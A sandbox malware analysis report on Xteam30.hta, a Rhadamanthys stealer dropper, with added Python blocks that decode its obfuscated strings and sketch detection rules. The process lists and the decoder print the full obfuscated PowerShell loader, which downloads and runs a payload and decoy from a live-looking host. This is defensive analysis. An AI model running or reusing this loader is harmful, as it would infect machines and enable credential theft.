Malware Analysis Report

2024-11-30 02:34

Sample ID 241101-yrywzasqds
Target Xteam30.hta
SHA256 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302
Tags
discovery execution rhadamanthys persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302

Threat Level: Known bad

The file Xteam30.hta was found to be: Known bad.

Malicious Activity Summary

discovery execution rhadamanthys persistence stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Rhadamanthys family

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V15 (the rendered matrix is not reproduced in this text export; the mapped technique names appear in the Signatures sections below)

Analysis: static1

Detonation Overview

Reported

2024-11-01 20:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-01 20:01

Reported

2024-11-01 20:04

Platform

win7-20241010-en

Max time kernel

120s

Max time network

121s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;
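The PowerShell stage above (the same script is launched again in behavioral2) stores every string it needs as an array of integers and rebuilds each one at run time by subtracting a constant, 29973 in this sample, from every element. The decoder below is an added example and is not part of the sandbox report: it takes the script body exactly as recorded in the process list, locates the `[char]($n-$key)` expression, resolves the literal assigned to that variable, and decodes every `@(...)` array. Finding the key this way rather than hard-coding 29973 is meant to carry over to other builds of the loader that use different variable names and offsets; that it does so is an assumption, not something the report states.

```python
"""Decoder for the integer-array string obfuscation in the Xteam30.hta
PowerShell stage (added example, not part of the sandbox report).

Every string the loader needs is stored as an array of integers and rebuilt at
run time by a helper equivalent to:

    function urRcG($a){$k=29973;$s=$Null;foreach($n in $a){$s+=[char]($n-$k)};return $s}

so each element is ord(char) + key.  Rather than hard-coding 29973, the decoder
finds the `[char]($n-$key)` expression, resolves the literal assigned to that
variable, and decodes every `@(...)` array in the script.  That this generalises
to other builds with different names and offsets is an assumption.
"""
import re

# The script body exactly as recorded in the report's process list (the
# `-ExecutionPolicy UnRestricted` prefix belongs to powershell.exe, not the script).
SCRIPT = r"""function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;"""

# An integer array literal: @(30019,30073,30081,30081)
ARRAY_RE = re.compile(r"@\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
# The decoding expression; group 1 is the name of the key variable.
CHAR_SUB_RE = re.compile(r"\[char\]\(\$\w+\s*-\s*\$(\w+)\)")


def find_key(script):
    """Return the constant subtracted from every array element."""
    m = CHAR_SUB_RE.search(script)
    if not m:
        raise ValueError("no [char]($x-$key) decoder expression found")
    assign = re.search(r"\$" + re.escape(m.group(1)) + r"\s*=\s*(\d+)", script)
    if not assign:
        raise ValueError("key variable $%s is never assigned a literal" % m.group(1))
    return int(assign.group(1))


def decode_array(numbers, key):
    """Turn '30077,30089,...' into text by subtracting the key from each element."""
    return "".join(chr(int(n) - key) for n in re.findall(r"\d+", numbers))


def decode_strings(script):
    """Decode every @(...) integer array in the script, in order of appearance."""
    key = find_key(script)
    return [decode_array(m.group(1), key) for m in ARRAY_RE.finditer(script)]


def extract_urls(strings):
    """Keep only the decoded strings that are download URLs."""
    return [s for s in strings if s.lower().startswith(("http://", "https://"))]


if __name__ == "__main__":
    decoded = decode_strings(SCRIPT)
    print("key:", find_key(SCRIPT))
    for s in decoded:
        print(repr(s))
    # The loader writes each download to %APPDATA% and starts it with
    # Start-Process, or through rundll32.exe when the name ends in ".dll".
    print("download URLs:", extract_urls(decoded))
```

Decoding the five arrays recovers `.dll`, `rundll32.exe`, `Net.WebClient` and two URLs under `https://tp2.5ee.mytemp.website/error/`, one for the decoy document and one for `Xteam30.exe`, which is why the only non-Microsoft host in the Network sections is tp2.5ee.mytemp.website. The `.dll`/`rundll32.exe` branch is never taken in this detonation (both downloads are a .docx and an .exe), but it shows the loader is built to drop DLL payloads as well.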

Network

Country Destination Domain Proto
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp

Files

memory/2592-2-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-01 20:01

Reported

2024-11-01 20:04

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

143s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Rhadamanthys family

rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 936 created 2624 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GifCamVideoEditor = "C:\\Users\\Admin\\Music\\GifCamUpdater\\GifCamOculus.exe" | C:\Users\Admin\AppData\Roaming\Xteam30.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4620 set thread context of 936 | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Xteam30.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\openwith.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4892 wrote to memory of 1352 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 1352 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 1352 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1352 wrote to memory of 1488 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1352 wrote to memory of 1488 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1352 wrote to memory of 4620 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1352 wrote to memory of 4620 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1352 wrote to memory of 4620 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 4620 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Roaming\Xteam30.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 936 wrote to memory of 4340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\SysWOW64\openwith.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx" /o ""

C:\Users\Admin\AppData\Roaming\Xteam30.exe

"C:\Users\Admin\AppData\Roaming\Xteam30.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\SysWOW64\openwith.exe

"C:\Windows\system32\openwith.exe"
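Read together, the behavioral2 signatures and process list describe one chain: mshta.exe (4892) runs the HTA, which spawns powershell.exe (1352); PowerShell drops and opens the decoy .docx in WINWORD.EXE (1488) and runs Xteam30.exe (4620); Xteam30.exe starts csc.exe (936) with an empty command line and sets its thread context, csc.exe in turn writes into openwith.exe (4340), and a Run key named GifCamVideoEditor pointing into the user's Music folder is written for persistence. The block below is an added example, not part of the sandbox report: it runs five detection rules over hand-constructed Sysmon-style process and registry records modeled on that chain. The `creator_pid` field stands in for what the report labels NtCreateUserProcessOtherParentProcess, the PID that actually called the process-creation API; the report shows creator PID 936 (csc.exe) and parent PID 2624 (sihost.exe), and attributing that spoofed-parent creation to openwith.exe is an assumption. The ATT&CK IDs and the list of hollowing host binaries are the example's own choices, not the report's.

```python
"""Detection rules for the Xteam30.hta execution chain, run over constructed
telemetry (added example, not part of the sandbox report).

PROCESS_EVENTS and REGISTRY_EVENTS are hand-built Sysmon-style records modeled
on the behavioral2 process tree and signatures.  The creator_pid field models
the real caller of the process-creation API; Sysmon's own ParentProcessId shows
the spoofed parent, so in practice this needs a sensor that records the calling
thread.  Attaching the spoofed-parent creation to openwith.exe is an assumption.
"""
import ntpath
import re

USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Signed binaries that normally take arguments and are popular hollowing hosts
# (the example's own list, not the report's).
HOLLOWING_HOSTS = {"csc.exe", "openwith.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}


def proc(pid, ppid, image, args, creator_pid=None):
    return {"pid": pid, "ppid": ppid, "image": image, "args": args, "creator_pid": creator_pid}


PROCESS_EVENTS = [  # constructed sample; PIDs and paths follow the report
    proc(2624, 1, r"C:\Windows\system32\sihost.exe", ""),
    proc(4892, 1, r"C:\Windows\SysWOW64\mshta.exe", r'"C:\Users\Admin\AppData\Local\Temp\Xteam30.hta"'),
    proc(1352, 4892, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         "-ExecutionPolicy UnRestricted function KvGmHPuFs (loader body truncated)"),
    proc(1488, 1352, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
         r'/n "C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx" /o ""'),
    proc(4620, 1352, r"C:\Users\Admin\AppData\Roaming\Xteam30.exe", ""),
    proc(936, 4620, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", ""),
    proc(4340, 2624, r"C:\Windows\SysWOW64\openwith.exe", "", creator_pid=936),
]
REGISTRY_EVENTS = [  # constructed sample; the Run value is the one the report records
    {"pid": 4620, "image": r"C:\Users\Admin\AppData\Roaming\Xteam30.exe",
     "key": r"HKU\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GifCamVideoEditor",
     "value": r"C:\Users\Admin\Music\GifCamUpdater\GifCamOculus.exe"},
]


def detect(process_events=PROCESS_EVENTS, registry_events=REGISTRY_EVENTS):
    """Return (technique, message) tuples, one per rule match."""
    by_pid = {e["pid"]: e for e in process_events}
    hits = []
    for e in process_events:
        parent = by_pid.get(e["ppid"])
        img = ntpath.basename(e["image"]).lower()
        pimg = ntpath.basename(parent["image"]).lower() if parent else ""
        # 1. The HTA handler spawning a script interpreter.
        if pimg == "mshta.exe" and img in SHELLS:
            hits.append(("T1218.005", f"mshta ({e['ppid']}) spawned {img} ({e['pid']})"))
        # 2. An interpreter launching an EXE from a user-writable path (dropped payload).
        if pimg in SHELLS and img.endswith(".exe") and USER_WRITABLE.match(e["image"]):
            hits.append(("T1105", f"{pimg} ran dropped EXE {e['image']}"))
        # 3. A hollowing host started with no arguments by a user-writable parent.
        if img in HOLLOWING_HOSTS and not e["args"] and parent and USER_WRITABLE.match(parent["image"]):
            hits.append(("T1055.012", f"{pimg} ({e['ppid']}) started argument-less {img} ({e['pid']})"))
        # 4. The recorded parent is not the process that made the creation call.
        c = e.get("creator_pid")
        if c is not None and c != e["ppid"]:
            cimg = ntpath.basename(by_pid[c]["image"]).lower() if c in by_pid else str(c)
            hits.append(("T1134.004", f"{cimg} ({c}) created {img} ({e['pid']}) under parent {pimg} ({e['ppid']})"))
    for r in registry_events:
        # 5. A Run value pointing at something under C:\Users.
        if re.search(r"\\CurrentVersion\\Run\\", r["key"], re.IGNORECASE) and USER_WRITABLE.match(r["value"].strip('"')):
            hits.append(("T1547.001", f"{ntpath.basename(r['image'])} set Run value {ntpath.basename(r['key'])} = {r['value']}"))
    return hits


if __name__ == "__main__":
    for technique, message in detect():
        print(technique, message)
```

Rule 3 fires on csc.exe because its parent lives under C:\Users and it was started with an empty command line, which is the pattern behind the "SetThreadContext" signature; it does not fire on openwith.exe, whose recorded parent is sihost.exe, so that stage is caught only by rule 4 through the creator/parent mismatch. Rule 2 deliberately ignores WINWORD.EXE: the decoy is opened from Program Files and only the payload comes from %APPDATA%.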

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 218.176.139.118.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.22.249.11:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
